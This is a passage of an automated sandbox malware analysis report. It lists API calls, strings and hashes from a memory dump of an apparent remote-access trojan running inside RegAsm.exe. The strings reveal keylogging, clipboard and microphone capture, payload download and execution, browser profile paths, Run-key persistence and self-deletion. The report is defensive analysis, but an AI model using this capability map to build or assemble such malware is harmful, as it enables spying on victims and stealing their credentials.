                                                  • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                  APIs
                                                  • GetSystemMetrics.USER32(0000004C), ref: 0041942B
                                                  • GetSystemMetrics.USER32(0000004D), ref: 00419431
                                                  • GetSystemMetrics.USER32(0000004E), ref: 00419437
                                                  • GetSystemMetrics.USER32(0000004F), ref: 0041943D
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MetricsSystem
                                                  • String ID:
                                                  • API String ID: 4116985748-0
                                                  • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                  • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                  • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                  • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                  APIs
                                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                    • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                  • String ID:
                                                  • API String ID: 1761009282-0
                                                  • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                  • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                  • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                  • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                  APIs
                                                  • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorHandling__start
                                                  • String ID: pow
                                                  • API String ID: 3213639722-2276729525
                                                  • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                  • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                  • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                  • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                  APIs
                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                  • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Init_thread_footer__onexit
                                                  • String ID: [End of clipboard]$[Text copied to clipboard]
                                                  • API String ID: 1881088180-3686566968
                                                  • Opcode ID: ed48047f974fffac8e7a9b5da0f857699ac9eabc6e4f24e176e756ae766f8f96
                                                  • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                                  • Opcode Fuzzy Hash: ed48047f974fffac8e7a9b5da0f857699ac9eabc6e4f24e176e756ae766f8f96
                                                  • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                                  APIs
                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ACP$OCP
                                                  • API String ID: 0-711371036
                                                  • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                  • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                  • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                  • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                  Strings
                                                  • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime
                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                  • API String ID: 481472006-1507639952
                                                  • Opcode ID: 76d5dd6ecd4cf0ae01fc24a6e422c0d46a6680b11c9869ab6839a1ab8c86e845
                                                  • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                                  • Opcode Fuzzy Hash: 76d5dd6ecd4cf0ae01fc24a6e422c0d46a6680b11c9869ab6839a1ab8c86e845
                                                  • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                                  APIs
                                                  • Sleep.KERNEL32 ref: 0041667B
                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DownloadFileSleep
                                                  • String ID: !D@
                                                  • API String ID: 1931167962-604454484
                                                  • Opcode ID: 9cbcf339d5782d21f0009647a5314bbf722ddb95791e80143436529d650ea742
                                                  • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                                  • Opcode Fuzzy Hash: 9cbcf339d5782d21f0009647a5314bbf722ddb95791e80143436529d650ea742
                                                  • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                  APIs
                                                  • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime
                                                  • String ID: | $%02i:%02i:%02i:%03i
                                                  • API String ID: 481472006-2430845779
                                                  • Opcode ID: 4182ea60a7d59cd3c4daa7da87bafc9d2ec88e2c779713b19cbff176a10afb6b
                                                  • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                  • Opcode Fuzzy Hash: 4182ea60a7d59cd3c4daa7da87bafc9d2ec88e2c779713b19cbff176a10afb6b
                                                  • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: alarm.wav$hYG
                                                  • API String ID: 1174141254-2782910960
                                                  • Opcode ID: a67f3d5249a1fb94c92f6e91cc59b1f19d843fcb2bd7b99b2c155253ed97e9bb
                                                  • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                                  • Opcode Fuzzy Hash: a67f3d5249a1fb94c92f6e91cc59b1f19d843fcb2bd7b99b2c155253ed97e9bb
                                                  • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                                  APIs
                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                  • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                  • String ID: Online Keylogger Stopped
                                                  • API String ID: 1623830855-1496645233
                                                  • Opcode ID: d648d1a5222b06a5ee4967885c863a2486092fd33b051c0742ca5bf23bf5bbb2
                                                  • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                  • Opcode Fuzzy Hash: d648d1a5222b06a5ee4967885c863a2486092fd33b051c0742ca5bf23bf5bbb2
                                                  • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                  APIs
                                                  • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                                  • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$BufferHeaderPrepare
                                                  • String ID: XMG
                                                  • API String ID: 2315374483-813777761
                                                  • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                  • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                  • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                  • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                  APIs
                                                  • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocaleValid
                                                  • String ID: IsValidLocaleName$kKD
                                                  • API String ID: 1901932003-3269126172
                                                  • Opcode ID: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                                  • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                  • Opcode Fuzzy Hash: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                                  • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                  • API String ID: 1174141254-4188645398
                                                  • Opcode ID: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                  • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                  • Opcode Fuzzy Hash: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                  • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                  • API String ID: 1174141254-2800177040
                                                  • Opcode ID: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                  • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                  • Opcode Fuzzy Hash: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                  • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: AppData$\Opera Software\Opera Stable\
                                                  • API String ID: 1174141254-1629609700
                                                  • Opcode ID: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                  • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                  • Opcode Fuzzy Hash: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                  • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                  APIs
                                                  • GetKeyState.USER32(00000011), ref: 0040B686
                                                    • Part of subcall function 0040A41B: GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A451
                                                    • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                    • Part of subcall function 0040A41B: GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                    • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                    • Part of subcall function 0040A41B: GetKeyboardState.USER32(?,?,004750F0), ref: 0040A479
                                                    • Part of subcall function 0040A41B: ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                    • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                  • String ID: [AltL]$[AltR]
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExecuteShell
                                                  • String ID: !D@$open
                                                  APIs
                                                  • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: State
                                                  • String ID: [CtrlL]$[CtrlR]
                                                  APIs
                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                  • __Init_thread_footer.LIBCMT ref: 00410F64
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Init_thread_footer__onexit
                                                  • String ID: ,kG$0kG
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D17F,00000000,004752D8,004752F0,?,pth_unenc), ref: 00413A6C
                                                  • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A80
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteOpenValue
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                  APIs
                                                  • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                                  • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteDirectoryFileRemove
                                                  • String ID: pth_unenc
                                                  APIs
                                                  • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                  • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ObjectProcessSingleTerminateWait
                                                  • String ID: pth_unenc
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                  • GetLastError.KERNEL32 ref: 00440D85
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                  • String ID:
                                                  APIs
                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                  • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                                  • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastRead
                                                  • String ID: